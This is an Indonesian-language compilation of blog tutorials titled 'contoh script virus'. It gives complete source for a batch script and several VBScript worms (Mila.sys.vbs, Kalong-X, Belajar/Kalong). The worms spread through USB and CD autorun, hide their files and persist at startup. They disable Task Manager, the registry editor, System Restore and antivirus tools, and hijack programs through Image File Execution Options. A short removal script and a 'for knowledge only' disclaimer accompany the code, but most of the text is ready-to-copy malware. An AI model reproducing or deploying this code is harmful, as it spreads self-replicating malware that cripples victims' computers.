contoh script virus
DESCRIPTION
contohTRANSCRIPT
Cara Membuat Virus Sederhana from Notepad!! Ditulis pada Juni 11, 2008 oleh fajar91
buka Notepad lo,trus copy-paste script ni..
@echo offcopy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /ycopy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /ycopy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /ycopy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /ycopy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /ycopy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /yreg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /freg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /freg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /freg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /freg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /freg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /freg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)- buat Autorun.inf dengan script:
[autorun]open=nama_file.bat
lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY- copy file-file tsb ke CD- nikmati efeknya
=========================================================================
MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD 1. Buka Notepad
2. Copy kan kode dibawah ini:
on error resume next
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,F0nAb0530,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(”Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(”WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
3. Simpan dengan nama Mila.sys.vbs
Label: Artikel Trik Sulap
=========================================================================
Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….‘Kalong-X‘Varian dari Kalong.VBSon error resume next
‘Dim kata-kata berikutdim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd
’siapkan isi autorunisi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”set fs = createobject(”Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlf
loopdo
‘buat file indukSet windowpath = fs.getspecialfolder(0)set tf = fs.getfile(windowpath & “k4l0n6-x.dll.vbs “)tf.attributes = 32set tf = fs.createtextfile(windowpath & “k4l0n6-x.dll.vbs”,2,true)tf.write rekurtf.closeset tf = fs.getfile(windowpath & “k4l0n6-x.dll.vbs”)tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inffor each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=fs.getfile(desades.path &”k4l0n6ms32.dll.vbs”)tf.attributes =32set tf=fs.createtextfile(desades.path &”k4l0n6ms32.dll.vbs”,2,true)tf.write rekurtf.closeset tf=fs.getfile(desades.path &”k4l0n6ms32.dll.vbs”)tf.attributes = 39
set tf =fs.getfile(desades.path &”autorun.inf”)tf.attributes = 32set tf=fs.createtextfile(desades.path &”autorun.inf”,2,true)tf.write isitf.closeset tf = fs.getfile(desades.path &”autorun.inf”)tf.attributes=39end ifnext
‘Manipulasi Registryset kalong = createobject(”WScript.Shell”)
‘Ubah IE Titlekalong.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,”:: ->KALONG-X<- ::”
‘File Hidden tak terlihatkalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden”,2, “REG_DWORD”
‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu”, “1″, “REG_DWORD”
‘Buat pesan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption”, “THE KALONG-X”kalong.RegWrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText”,”No reason for Panic”
‘Aktifkan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunSystemdir”, windowpath & “batch- k4l0n6.dll.vbs”
‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepadkalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exeDebugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exeDebugger”,”notepad.exe”
‘Bonusif check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :
Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :[Version]Signature=”$Chicago$”Provider=Fariskhi
[DefaultInstall]AddReg=UnhookRegKeyDelReg=del
[UnhookRegKey]HKCU,SoftwareMicrosoftInternet ExplorerMain, Window Title,0, “INTERNET EXPLORER”
[del]HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoFindHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoFolderOptionsHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoRun
HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableRegistryToolsHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableTaskMgrHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoViewContextMenuHKLM, SoftwareMicrosoftWindowsCurrentVersionWinlogon, LegalNoticeCaptionHKLM, SoftwareMicrosoftWindowsCurrentVersionWinlogon, LegalNoticeTextHKLM, SoftwareMicrosoftWindowsCurrentVersionRun, SystemdirHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exe, Debugger
Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.
==================================================================================================================================================
Belajar membuat virus VBS dengan Notepad
Iseng-iseng mencolok Flash Disc saudara gw tiba-tiba gw nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini gw beri nama Ў°BELAJAR.VBSЎ±. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–// on error resume next
‘//–Dim kata-kata berikut ini–// dim rekur,windowpath,flashdrive,fs,mf,isi,tf,lagibelajar,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–// isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe belajar.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows) Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- belajar.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- belajar.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- belajar.dll.vbs “) tf.attributes = 39 ‘//–Buat Autorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–// ‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives ‘//–Cek Drive–// If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–// set tf=fs.getfile(flashdrive.path &”\belajar.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\belajar.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\belajar.dll.vbs “) tf.attributes = 39
‘//–Buat Autorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–// set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next
‘//–Manipulasi Registry–// set lagibelajar = createobject(”WScript.Shell”)
‘//–Manip - Ubah Title Internet Explorer menjadi belajar Mania–// lagibelajar.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” belajar MANIA “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–// lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–// lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–// lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip - Munculkan Pesan Setiap Windows Startup–// lagibelajar.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm belajar. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–// lagibelajar.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- belajar.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–// lagibelajar.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “belajar” lagibelajar.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”belajarMania”
‘//–LOOPing–// if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(”Wscript.shell”) sd.run windowpath & “\explorer.exe /e,/, ” & Wscript.ScriptFullname ‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih Ў°All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
Membuat Virus Sederhana - Notepadutuhwibowo, September 14th, 2008 Cracking, Tutorial, Virus 14 Comments
Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//on error resume next
‘//–Dim kata-kata berikut ini–//dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”set fs = createobject(”Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)Set windowpath = fs.getspecialfolder(0)set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)tf.attributes = 32set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)tf.write rekursiftf.closeset tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)tf.attributes = 39‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives‘//–Cek Drive–//If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)tf.attributes =32set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)tf.write rekursiftf.closeset tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//set tf =fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes = 32set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)tf.write isitf.closeset tf = fs.getfile(flashdrive.path &”\autorun.inf”)tf.attributes=39end ifnext
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoFolderOptions”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
